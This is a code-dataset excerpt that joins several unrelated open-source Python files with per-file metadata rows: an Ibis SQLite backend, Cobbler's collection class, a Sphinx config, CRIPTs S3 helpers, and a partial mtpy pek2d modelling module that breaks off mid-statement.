return cls
@udf
def _ibis_sqlite_reverse(string):
return string[::-1]
@udf
def _ibis_sqlite_string_ascii(string):
return ord(string[0])
@udf
def _ibis_sqlite_capitalize(string):
return string.capitalize()
@udf
def _ibis_sqlite_translate(string, from_string, to_string):
table = str.maketrans(from_string, to_string)
return string.translate(table)
@udf
def _ibis_sqlite_regex_search(string, regex):
"""Return whether `regex` exists in `string`.
Parameters
----------
string : str
regex : str
Returns
-------
found : bool
"""
return re.search(regex, string) is not None
@udf
def _ibis_sqlite_regex_replace(string, pattern, replacement):
"""Replace occurences of `pattern` in `string` with `replacement`.
Parameters
----------
string : str
pattern : str
replacement : str
Returns
-------
result : str
"""
return re.sub(pattern, replacement, string)
@udf
def _ibis_sqlite_regex_extract(string, pattern, index):
"""Extract match of regular expression `pattern` from `string` at `index`.
Parameters
----------
string : str
pattern : str
index : int
Returns
-------
result : str or None
"""
result = re.search(pattern, string)
if result is not None and 0 <= index <= (result.lastindex or -1):
return result.group(index)
return None
@udf
def _ibis_sqlite_exp(arg):
"""Exponentiate `arg`.
Parameters
----------
arg : number
Number to raise to `e`.
Returns
-------
result : Optional[number]
None If the input is None
"""
return math.exp(arg)
@udf
def _ibis_sqlite_log(arg, base):
if arg < 0 or base < 0:
return None
return math.log(arg, base)
@udf
def _ibis_sqlite_ln(arg):
if arg < 0:
return None
return math.log(arg)
@udf
def _ibis_sqlite_log2(arg):
return _ibis_sqlite_log(arg, 2)
@udf
def _ibis_sqlite_log10(arg):
return _ibis_sqlite_log(arg, 10)
@udf
def _ibis_sqlite_floor(arg):
return math.floor(arg)
@udf
def _ibis_sqlite_ceil(arg):
return math.ceil(arg)
@udf
def _ibis_sqlite_sign(arg):
if not arg:
return 0
return math.copysign(1, arg)
@udf
def _ibis_sqlite_floordiv(left, right):
return left // right
@udf
def _ibis_sqlite_mod(left, right):
return left % right
@udf
def _ibis_sqlite_power(arg, power):
"""Raise `arg` to the `power` power.
Parameters
----------
arg : number
Number to raise to `power`.
power : number
Number to raise `arg` to.
Returns
-------
result : Optional[number]
None If either argument is None or we're trying to take a fractional
power or a negative number
"""
if arg < 0.0 and not power.is_integer():
return None
return arg ** power
@udf
def _ibis_sqlite_sqrt(arg):
"""Square root of `arg`.
Parameters
----------
arg : Optional[number]
Number to take the square root of
Returns
-------
result : Optional[number]
None if `arg` is None or less than 0 otherwise the square root
"""
return None if arg is None or arg < 0.0 else math.sqrt(arg)
class _ibis_sqlite_var:
def __init__(self, offset):
self.mean = 0.0
self.sum_of_squares_of_differences = 0.0
self.count = 0
self.offset = offset
def step(self, value):
if value is not None:
self.count += 1
delta = value - self.mean
self.mean += delta / self.count
self.sum_of_squares_of_differences += delta * (value - self.mean)
def finalize(self):
count = self.count
if count:
return self.sum_of_squares_of_differences / (count - self.offset)
return None
@udaf
class _ibis_sqlite_var_pop(_ibis_sqlite_var):
def __init__(self):
super().__init__(0)
@udaf
class _ibis_sqlite_var_samp(_ibis_sqlite_var):
def __init__(self):
super().__init__(1)
def number_of_arguments(callable):
signature = inspect.signature(callable)
parameters = signature.parameters.values()
kinds = [param.kind for param in parameters]
valid_kinds = (
inspect.Parameter.POSITIONAL_OR_KEYWORD,
inspect.Parameter.POSITIONAL_ONLY,
)
if any(kind not in valid_kinds for kind in kinds) or any(
param.default is not inspect.Parameter.empty for param in parameters
):
raise TypeError(
'Only positional arguments without defaults are supported in Ibis '
'SQLite function registration'
)
return len(parameters)
def _register_function(func, con):
"""Register a Python callable with a SQLite connection `con`.
Parameters
----------
func : callable
con : sqlalchemy.Connection
"""
nargs = number_of_arguments(func)
con.connection.connection.create_function(func.__name__, nargs, func)
def _register_aggregate(agg, con):
"""Register a Python class that performs aggregation in SQLite.
Parameters
----------
agg : type
con : sqlalchemy.Connection
"""
nargs = number_of_arguments(agg.step) - 1 # because self
con.connection.connection.create_aggregate(agg.__name__, nargs, agg)
class SQLiteClient(alch.AlchemyClient):
"""The Ibis SQLite client class."""
dialect = SQLiteDialect
database_class = SQLiteDatabase
table_class = SQLiteTable
def __init__(self, path=None, create=False):
super().__init__(sa.create_engine("sqlite://"))
self.name = path
self.database_name = "base"
if path is not None:
self.attach(self.database_name, path, create=create)
for func in _SQLITE_UDF_REGISTRY:
self.con.run_callable(functools.partial(_register_function, func))
for agg in _SQLITE_UDAF_REGISTRY:
self.con.run_callable(functools.partial(_register_aggregate, agg))
@property
def current_database(self) -> Optional[str]:
return self.database_name
def list_databases(self):
raise NotImplementedError(
'Listing databases in SQLite is not implemented'
)
def set_database(self, name: str) -> None:
raise NotImplementedError('set_database is not implemented for SQLite')
def attach(self, name, path, create: bool = False) -> None:
"""Connect another SQLite database file
Parameters
----------
name : string
Database name within SQLite
path : string
Path to sqlite3 file
create : boolean, optional
If file does not exist, create file if True otherwise raise an
Exception
"""
if not os.path.exists(path) and not create:
raise FileNotFoundError(
errno.ENOENT, os.strerror(errno.ENOENT), path
)
quoted_name = self.con.dialect.identifier_preparer.quote(name)
self.raw_sql(
"ATTACH DATABASE {path!r} AS {name}".format(
path=path, name=quoted_name
)
)
self.has_attachment = True
@property
def client(self):
return self
def _get_sqla_table(self, name, schema=None, autoload=True):
return sa.Table(
name,
self.meta,
schema=schema or self.current_database,
autoload=autoload,
)
def table(self, name, database=None):
"""
Create a table expression that references a particular table in the
SQLite database
Parameters
----------
name : string
database : string, optional
name of the attached database that the table is located in.
Returns
-------
TableExpr
"""
alch_table = self._get_sqla_table(name, schema=database)
node = self.table_class(alch_table, self)
return self.table_expr_class(node)
def list_tables(self, like=None, database=None, schema=None):
if database is None:
database = self.database_name
return super().list_tables(like, schema=database)
def _table_from_schema(
self, name, schema, database: Optional[str] = None
) -> sa.Table:
columns = self._columns_from_schema(name, schema)
return sa.Table(name, self.meta, schema=database, *columns)
| apache-2.0 | -6,957,263,060,061,383,000 | 21.613909 | 79 | 0.605408 | false |
remotesyssupport/cobbler-template-files | cobbler/collection.py | 1 | 13689 | """
Base class for any serializable list of things...
Copyright 2006-2008, Red Hat, Inc
Michael DeHaan <[email protected]>
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
02110-1301 USA
"""
import exceptions
from cexceptions import *
import serializable
import utils
import glob
import sub_process
import action_litesync
import item_system
import item_profile
import item_distro
import item_repo
import item_image
from utils import _
class Collection(serializable.Serializable):
def __init__(self,config):
"""
Constructor.
"""
self.config = config
self.clear()
self.api = self.config.api
self.log_func = self.api.log
self.lite_sync = None
def factory_produce(self,config,seed_data):
"""
Must override in subclass. Factory_produce returns an Item object
from datastructure seed_data
"""
raise exceptions.NotImplementedError
def clear(self):
"""
Forget about objects in the collection.
"""
self.listing = {}
def find(self, name=None, return_list=False, no_errors=False, **kargs):
"""
Return first object in the collection that maches all item='value'
pairs passed, else return None if no objects can be found.
When return_list is set, can also return a list. Empty list
would be returned instead of None in that case.
"""
matches = []
# support the old style innovation without kwargs
if name is not None:
kargs["name"] = name
kargs = self.__rekey(kargs)
# no arguments is an error, so we don't return a false match
if len(kargs) == 0:
raise CX(_("calling find with no arguments"))
# performance: if the only key is name we can skip the whole loop
if len(kargs) == 1 and kargs.has_key("name") and not return_list:
return self.listing.get(kargs["name"].lower(), None)
for (name, obj) in self.listing.iteritems():
if obj.find_match(kargs, no_errors=no_errors):
matches.append(obj)
if not return_list:
if len(matches) == 0:
return None
return matches[0]
else:
return matches
SEARCH_REKEY = {
'kopts' : 'kernel_options',
'kopts_post' : 'kernel_options_post',
'ksmeta' : 'ks_meta',
'inherit' : 'parent',
'ip' : 'ip_address',
'mac' : 'mac_address',
'virt-file-size' : 'virt_file_size',
'virt-ram' : 'virt_ram',
'virt-path' : 'virt_path',
'virt-type' : 'virt_type',
'virt-bridge' : 'virt_bridge',
'virt-cpus' : 'virt_cpus',
'dhcp-tag' : 'dhcp_tag',
'netboot-enabled' : 'netboot_enabled'
}
def __rekey(self,hash):
"""
Find calls from the command line ("cobbler system find")
don't always match with the keys from the datastructs and this
makes them both line up without breaking compatibility with either.
Thankfully we don't have a LOT to remap.
"""
newhash = {}
for x in hash.keys():
if self.SEARCH_REKEY.has_key(x):
newkey = self.SEARCH_REKEY[x]
newhash[newkey] = hash[x]
else:
newhash[x] = hash[x]
return newhash
def to_datastruct(self):
"""
Serialize the collection
"""
datastruct = [x.to_datastruct() for x in self.listing.values()]
return datastruct
def from_datastruct(self,datastruct):
if datastruct is None:
return
for seed_data in datastruct:
item = self.factory_produce(self.config,seed_data)
self.add(item)
def rename(self,ref,newname,with_sync=True,with_triggers=True):
"""
Allows an object "ref" to be given a newname without affecting the rest
of the object tree.
"""
# make a copy of the object, but give it a new name.
oldname = ref.name
newref = ref.make_clone()
newref.set_name(newname)
self.add(newref, with_triggers=with_triggers,save=True)
# now descend to any direct ancestors and point them at the new object allowing
# the original object to be removed without orphanage. Direct ancestors
# will either be profiles or systems. Note that we do have to care as
# set_parent is only really meaningful for subprofiles. We ideally want a more
# generic set_parent.
kids = ref.get_children()
for k in kids:
if k.COLLECTION_TYPE == "distro":
raise CX(_("internal error, not expected to have distro child objects"))
elif k.COLLECTION_TYPE == "profile":
if k.parent != "":
k.set_parent(newname)
else:
k.set_distro(newname)
self.api.profiles().add(k, save=True, with_sync=with_sync, with_triggers=with_triggers)
elif k.COLLECTION_TYPE == "system":
k.set_profile(newname)
self.api.systems().add(k, save=True, with_sync=with_sync, with_triggers=with_triggers)
elif k.COLLECTION_TYPE == "repo":
raise CX(_("internal error, not expected to have repo child objects"))
else:
raise CX(_("internal error, unknown child type (%s), cannot finish rename" % k.COLLECTION_TYPE))
# now delete the old version
self.remove(oldname, with_delete=True, with_triggers=with_triggers)
return True
def add(self,ref,save=False,with_copy=False,with_triggers=True,with_sync=True,quick_pxe_update=False,check_for_duplicate_names=False,check_for_duplicate_netinfo=False):
"""
Add an object to the collection, if it's valid. Returns True
if the object was added to the collection. Returns False if the
object specified by ref deems itself invalid (and therefore
won't be added to the collection).
with_copy is a bit of a misnomer, but lots of internal add operations
can run with "with_copy" as False. True means a real final commit, as if
entered from the command line (or basically, by a user).
With with_copy as False, the particular add call might just be being run
during deserialization, in which case extra semantics around the add don't really apply.
So, in that case, don't run any triggers and don't deal with any actual files.
"""
if self.lite_sync is None:
self.lite_sync = action_litesync.BootLiteSync(self.config)
# migration path for old API parameter that I've renamed.
if with_copy and not save:
save = with_copy
if not save:
# for people that aren't quite aware of the API
# if not saving the object, you can't run these features
with_triggers = False
with_sync = False
# Avoid adding objects to the collection
# if an object of the same/ip/mac already exists.
self.__duplication_checks(ref,check_for_duplicate_names,check_for_duplicate_netinfo)
if ref is None or not ref.is_valid():
raise CX(_("insufficient or invalid arguments supplied"))
if ref.COLLECTION_TYPE != self.collection_type():
raise CX(_("API error: storing wrong data type in collection"))
if not save:
# don't need to run triggers, so add it already ...
self.listing[ref.name.lower()] = ref
# perform filesystem operations
if save:
self.log_func("saving %s %s" % (self.collection_type(), ref.name))
# failure of a pre trigger will prevent the object from being added
if with_triggers:
self._run_triggers(ref,"/var/lib/cobbler/triggers/add/%s/pre/*" % self.collection_type())
self.listing[ref.name.lower()] = ref
# save just this item if possible, if not, save
# the whole collection
self.config.serialize_item(self, ref)
if with_sync:
if isinstance(ref, item_system.System):
self.lite_sync.add_single_system(ref.name)
elif isinstance(ref, item_profile.Profile):
self.lite_sync.add_single_profile(ref.name)
elif isinstance(ref, item_distro.Distro):
self.lite_sync.add_single_distro(ref.name)
elif isinstance(ref, item_image.Image):
self.lite_sync.add_single_image(ref.name)
elif isinstance(ref, item_repo.Repo):
pass
else:
print _("Internal error. Object type not recognized: %s") % type(ref)
if not with_sync and quick_pxe_update:
if isinstance(ref, item_system.System):
self.lite_sync.update_system_netboot_status(ref.name)
# save the tree, so if neccessary, scripts can examine it.
if with_triggers:
self._run_triggers(ref,"/var/lib/cobbler/triggers/add/%s/post/*" % self.collection_type())
# update children cache in parent object
parent = ref.get_parent()
if parent != None:
parent.children[ref.name] = ref
return True
def _run_triggers(self,ref,globber):
return utils.run_triggers(ref,globber)
def __duplication_checks(self,ref,check_for_duplicate_names,check_for_duplicate_netinfo):
"""
Prevents adding objects with the same name.
Prevents adding or editing to provide the same IP, or MAC.
Enforcement is based on whether the API caller requests it.
"""
# always protect against duplicate names
if check_for_duplicate_names:
match = None
if isinstance(ref, item_system.System):
match = self.api.find_system(ref.name)
elif isinstance(ref, item_profile.Profile):
match = self.api.find_profile(ref.name)
elif isinstance(ref, item_distro.Distro):
match = self.api.find_distro(ref.name)
elif isinstance(ref, item_repo.Repo):
match = self.api.find_repo(ref.name)
if match:
raise CX(_("An object already exists with that name. Try 'edit'?"))
# the duplicate mac/ip checks can be disabled.
if not check_for_duplicate_netinfo:
return
if isinstance(ref, item_system.System):
for (name, intf) in ref.interfaces.iteritems():
match_ip = []
match_mac = []
input_mac = intf["mac_address"]
input_ip = intf["ip_address"]
if not self.api.settings().allow_duplicate_macs and input_mac is not None and input_mac != "":
match_mac = self.api.find_system(mac_address=input_mac,return_list=True)
if not self.api.settings().allow_duplicate_ips and input_ip is not None and input_ip != "":
match_ip = self.api.find_system(ip_address=input_ip,return_list=True)
# it's ok to conflict with your own net info.
for x in match_mac:
if x.name != ref.name:
raise CX(_("Can't save system %s. The MAC address (%s) is already used by system %s (%s)") % (ref.name, intf["mac_address"], x.name, name))
for x in match_ip:
if x.name != ref.name:
raise CX(_("Can't save system %s. The IP address (%s) is already used by system %s (%s)") % (ref.name, intf["ip_address"], x.name, name))
def printable(self):
"""
Creates a printable representation of the collection suitable
for reading by humans or parsing from scripts. Actually scripts
would be better off reading the YAML in the config files directly.
"""
values = self.listing.values()[:] # copy the values
values.sort() # sort the copy (2.3 fix)
results = []
for i,v in enumerate(values):
results.append(v.printable())
if len(values) > 0:
return "\n\n".join(results)
else:
return _("No objects found")
def __iter__(self):
"""
Iterator for the collection. Allows list comprehensions, etc
"""
for a in self.listing.values():
yield a
def __len__(self):
"""
Returns size of the collection
"""
return len(self.listing.values())
def collection_type(self):
"""
Returns the string key for the name of the collection (for use in messages for humans)
"""
return exceptions.NotImplementedError
| gpl-2.0 | 2,147,395,809,947,606,300 | 37.452247 | 172 | 0.587771 | false |
ericholscher/django-kong | docs/source/conf.py | 1 | 6608 | # -*- coding: utf-8 -*-
#
# Django Kong documentation build configuration file, created by
# sphinx-quickstart on Wed Nov 18 09:17:59 2009.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.append(os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.intersphinx']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Django Kong'
copyright = u'2009, Eric Holscher'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.9'
# The full version, including alpha/beta/rc tags.
release = '0.9'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of documents that shouldn't be included in the build.
#unused_docs = []
# List of directories, relative to source directory, that shouldn't be searched
# for source files.
exclude_trees = []
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. Major themes that come with
# Sphinx are currently 'default' and 'sphinxdoc'.
import sphinx_rtd_theme
html_theme = "sphinx_rtd_theme"
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
html_theme_options = {
'collapse_navigation': False,
}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_use_modindex = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = ''
# Output file base name for HTML help builder.
htmlhelp_basename = 'DjangoKongdoc'
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'DjangoKong.tex', u'Django Kong Documentation',
u'Eric Holscher', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_use_modindex = True
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {'http://docs.python.org/': None}
language = 'en'
| mit | 6,669,484,339,364,828,000 | 31.07767 | 80 | 0.714286 | false |
lakiw/cripts | cripts/core/s3_tools.py | 1 | 4177 | from django.conf import settings
from bson.objectid import ObjectId
import boto
from boto.s3.connection import S3Connection
from boto.s3.key import Key
class S3Error(Exception):
"""
Generic S3 Exception.
"""
pass
def s3_connector(bucket):
"""
Connect to an S3 bucket.
:param bucket: The bucket to connect to.
:type bucket: str
:returns: :class:`boto.s3.connection.S3Connection`, S3Error
"""
S3_hostname = getattr(settings, 'S3_HOSTNAME', S3Connection.DefaultHost)
try:
conn = S3Connection(aws_access_key_id = settings.AWS_ACCESS_KEY_ID,
aws_secret_access_key = settings.AWS_SECRET_ACCESS_KEY,
is_secure = True,
host = S3_hostname)
mybucket = conn.get_bucket(bucket)
return mybucket
except boto.exception.S3ResponseError as e:
raise S3Error("Error connecting to S3: %s" % e)
except:
raise
def s3_create_bucket(bucket):
"""
Create an S3 bucket.
:param bucket: The bucket to create.
:type bucket: str
:returns: S3Error
"""
try:
S3_hostname = getattr(settings, 'S3_HOSTNAME', S3Connection.DefaultHost)
conn = S3Connection(aws_access_key_id = settings.AWS_ACCESS_KEY_ID,
aws_secret_access_key = settings.AWS_SECRET_ACCESS_KEY,
is_secure = True,
host = S3_hostname)
conn.create_bucket(bucket)
except boto.exception.S3CreateError as e:
raise S3Error("Error creating bucket in S3: %s" % e)
except:
raise
def s3_translate_collection(collection):
"""
Translate CRIPs collection to S3 bucket.
:param collection: The collection to translate.
:type collection: str
:returns: str
"""
bucket = settings.COLLECTION_TO_BUCKET_MAPPING[collection.replace(".files","")]
return bucket + settings.S3_SEPARATOR + settings.S3_ID
def file_exists_s3(sample_md5, collection):
"""
Determine if a file aleady exists in S3.
:param sample_md5: The MD5 to search for.
:type sample_md5: str
:param collection: The collection to translate for lookup.
:type collection: str
:returns: str
"""
bucket = s3_connector(s3_translate_collection(collection))
return bucket.get_key(sample_md5)
def put_file_s3(data, collection):
"""
Add a file to S3.
:param data: The data to add.
:type data: str
:param collection: The collection to translate for addition.
:type collection: str
:returns: str
"""
bucket = s3_connector(s3_translate_collection(collection))
k = Key(bucket)
oid = ObjectId()
k.key = oid
# TODO: pass md5 to put_file() to avoid recalculation.
k.set_contents_from_string(data)
return oid
def get_file_s3(oid, collection):
"""
Get a file from S3.
:param oid: The ObjectId to lookup.
:type oid: str
:param collection: The collection to translate for lookup.
:type collection: str
:returns: str
"""
bucket = s3_connector(s3_translate_collection(collection))
k = bucket.get_key(oid)
return k.get_contents_as_string()
def get_filename_s3(sample_md5, collection):
"""
Get a filename from S3.
:param sample_md5: The MD5 to lookup.
:type sample_md5: str
:param collection: The collection to translate for lookup.
:type collection: str
:returns: str
"""
try:
bucket = s3_connector(s3_translate_collection(collection))
k = bucket.get_key(sample_md5)
filename = k.get_metadata("filename")
except Exception:
return None
return filename
def delete_file_s3(sample_md5, collection):
"""
Remove a file from S3.
:param sample_md5: The MD5 to remove.
:type sample_md5: str
:param collection: The collection to translate for lookup.
:type collection: str
:returns: True, None
"""
try:
bucket = s3_connector(s3_translate_collection(collection))
k = bucket.get_key(sample_md5)
k.delete()
return True
except Exception:
return None
| mit | 9,091,742,652,331,264,000 | 26.123377 | 83 | 0.629638 | false |
geophysics/mtpy | mtpy/modeling/pek2d.py | 1 | 20327 | # -*- coding: utf-8 -*-
"""
Created on Tue Oct 28 14:06:45 2014
@author: a1655681
"""
import mtpy.modeling.occam2d as o2d
import mtpy.modeling.pek1dclasses as p1dc
import numpy as np
import os
import os.path as op
import pek2dforward as p2d
import string
import scipy.interpolate as si
import mtpy.utils.filehandling as fh
import mtpy.core.edi as mtedi
import mtpy.modeling.pek2dforward as p2d
class Model():
"""
class for creating and reading model files
"""
def __init__(self, working_directory, **input_parameters):
self.working_directory = working_directory
self.edi_directory = None
self.occam_configfile = None
self.parameters_ctl = {}
self.parameters_ctl['ctl_string'] = 'TAB'
self.parameters_ctl['units_string'] = 'PR'
self.parameters_ctl['quadrants'] = '++--'
self.parameters_ctl['orientation_string'] = '0 0.d0 0.d0'
self.parameters_ctl['convergence_string'] = '1 6 1.d-4'
self.parameters_ctl['roughness_string'] = '2 1000.0d0 1000.0d0 0.d0'
self.parameters_ctl['anisotropy_penalty_string'] = '2 1000.d0 0.d0'
self.parameters_ctl['anisotropy_ctl_string'] = '1.d0 1.d0 1.d0'
self.parameters_model = {}
self.parameters_model['no_sideblockelements'] = 5
self.parameters_model['no_bottomlayerelements'] = 4
self.parameters_model['firstlayer_thickness'] = 100
#model depth is in km!
self.parameters_model['model_depth'] = 100
self.parameters_model['no_layers'] = 25
self.parameters_model['max_blockwidth'] = 1000
self.parameters_data = {}
self.parameters_data['strike'] = 0.
self.parameters_data['errorfloor'] = dict(z=np.array([[0.05,0.05],
[0.05,0.05]]),
tipper=np.array([0.02,0.02]))
self.parameters_data['errorfloor_type'] = 'offdiagonals'# offdiagonals or relative
self.parameters_data['max_no_frequencies'] = 50
self.parameters_data['mode'] = [1,1,1,1,1,1]
self.n_airlayers = 5
self.mesh = None
self.meshlocations_x = None
self.meshlocations_z = None
self.meshblockwidths_x = None
self.meshblockthicknesses_z = None
self.profile_easts = None
self.profile_norths = None
self.inversion1d_dirdict = {}
self.inversion1d_masterdir = '.'
self.inversion1d_modelno = 0
self.inversion1d_imethod = 'nearest'
self.idir_basename = 'aniso'
self.binsize_resistivitylog10 = 1.
self.binsize_strike = 20.
self.build_from_1d = False
self.rotation = 0.
self.modelfile = 'model.dat'
self.anisotropy_min_depth = 0.
self.strike = 0.
self.edifiles = []
self.Data = None
self.modelfile = 'model'
self.resfile = 'pb.res'
self.cvgfile = 'pb.cvg'
self.outfile = 'pb.out'
self.pexfile = 'pb.pex'
self.andfile = 'pb.and'
self.exlfile = 'pb.exl'
update_dict = {}
#correcting dictionary for upper case keys
input_parameters_nocase = {}
for key in input_parameters.keys():
input_parameters_nocase[key.lower()] = input_parameters[key]
update_dict.update(input_parameters_nocase)
for dictionary in [self.parameters_model,self.parameters_data]:
for key in dictionary.keys():
if key in update_dict:
#check if entry exists:
try:
value = float(update_dict[key])
dictionary[key] = value
except:
value = update_dict[key]
dictionary[key] = value
if type(value) in [str]:
if value.strip().lower()=='none':
dictionary[key] = None
for key in update_dict:
try:
value = getattr(self,key)
if update_dict[key] is not None:
try:
value = float(update_dict[key])
setattr(self,key,value)
except:
value = update_dict[key]
setattr(self,key,value)
if type(value) in [str]:
if value.strip().lower()=='none':
setattr(self,key,None)
except:
continue
self.input_parameters = update_dict
print self.idir_basename
if self.edifiles == []:
if self.edi_directory is not None:
try:
self.edifiles = [op.join(self.edi_directory,
f) for f in os.listdir(self.edi_directory)]
except IOError:
print("failed to find edi directory")
pass
def build_inputfiles(self):
inversiondir = fh.make_unique_folder(self.working_directory,basename=self.idir_basename)
os.mkdir(op.join(self.working_directory,inversiondir))
self.working_directory = inversiondir
self.build_model()
self.write_modelfile()
self.write_datafiles()
self.write_ctlfile()
def read_model(self):
"""
use pek2d forward python setup code to read the model
"""
model = p2d.Model(working_directory = self.working_directory,
**self.input_parameters)
model.read_model()
for attr in ['meshblockwidths_x', 'meshblockthicknesses_z',
'meshlocations_x', 'meshlocations_z',
'modelblocknums', 'resistivity', 'sds',
'station_indices','modelfile_reslines',
'n_airlayers']:
try:
setattr(self,attr,getattr(model,attr))
except:
print "can't assign attribute {}".format(attr)
def read_outfile(self,chunk=1750,linelength=52):
"""
read the outfile from the reverse end and get out last iteration
"""
# open outfile
outfile = open(op.join(self.working_directory,self.outfile))
if not hasattr(self,'modelblocknums'):
self.read_model()
elif self.modelblocknums is None:
self.read_model()
mb = np.sum(self.modelfile_reslines[:,-6:].astype(int))
# read backwards from end of file, in chunks of 175, until a 4-column row is found
nn = 1
while True:
try:
outfile.seek(-nn, 2)
outfile.readline()
line = outfile.readline().strip().split()
n = outfile.tell()
if len(line) == 4:
break
nn += chunk
except:
print "invalid outfile, cannot read resistivity values from outfile yet"
return
m = 0
while line[0] != '1':
outfile.seek(n-linelength*m)
line = outfile.readline().strip().split()
m += 1
self.outfile_reslines = np.zeros([mb,4])
for m in range(mb):
self.outfile_reslines[m] = [float(ll) for ll in line]
line = outfile.readline().strip().split()
# iterate through resistivity and assign new values if they have been inverted for
n = 0
nair = self.n_airlayers + 1
nx,nz = len(self.meshlocations_x), len(self.meshlocations_z)
for i in range(nz - nair):
for j in range(nx - 1):
for k in range(6):
mfi = (nx - 1)*i + j + 1
if self.modelfile_reslines[mfi,k+8] == '1':
if k < 3:
self.resistivity[i+nair-1,j,k] = self.outfile_reslines[n,2]
else:
self.sds[i+nair-1,j,k-3] = self.outfile_reslines[n,2]
n += 1
# print i,j,k,n
def build_model(self):
"""
build model file string
"""
# build a forward model object
ro = p2d.Model(self.working_directory,**self.input_parameters)
ro.build_model()
# assign relavent parameters to pek 2d inverse object
for at in ['stationlocations','parameters_model',
'meshlocations_x','meshlocations_z',
'meshblockwidths_x','meshblockthicknesses_z',
'profile_easts','profile_norths','Data',
'meshblockthicknesses_zair','meshlocations_zair']:
attvalue = getattr(ro,at)
setattr(self,at,attvalue)
ro.get_station_meshblock_numbers()
if ro.build_from_1d:
# try:
ro.get_1d_results()
ro.interpolate_1d_results()
for at in ['inversion1d_dirdict','inversion1d_modelno',
'models1d','resistivity','stationlocations',
'blockcentres_x','blockcentres_z']:
attvalue = getattr(ro,at)
setattr(self,at,attvalue)
# except:
else:
for at in ['resistivity','stationlocations',
'blockcentres_x','blockcentres_z']:
setattr(self,at,getattr(ro,at))
for at in ['inversion1d_dirdict','inversion1d_modelno',
'models1d']:
setattr(self,at,None)
ro.get_station_meshblock_numbers()
self.stationblocknums=ro.stationblocknums
self.build_modelfilestring()
def write_modelfile(self):
if not hasattr(self,'modelfilestring'):
self.build_model()
outfile = open(op.join(self.working_directory,
self.modelfile),'w')
outfile.write(self.modelfilestring)
outfile.close()
def build_modelfilestring(self):
# initialise a list containing info for model file
modelfilestring = []
# add header info
modelfilestring.append('NEW')
modelfilestring.append(' 1')
modelfilestring.append(' 1.000')
# add string giving number of cells:
modelfilestring.append(''.join(['%5i'%i for i in [len(self.meshlocations_x),
len(self.meshlocations_z)+self.n_airlayers,
self.n_airlayers+1]]))
# add strings giving horizontal and vertical mesh steps
meshz = list(self.meshblockthicknesses_zair)+list(self.meshblockthicknesses_z)
for meshstep in [self.meshblockwidths_x,meshz]:
modelfilestring.append\
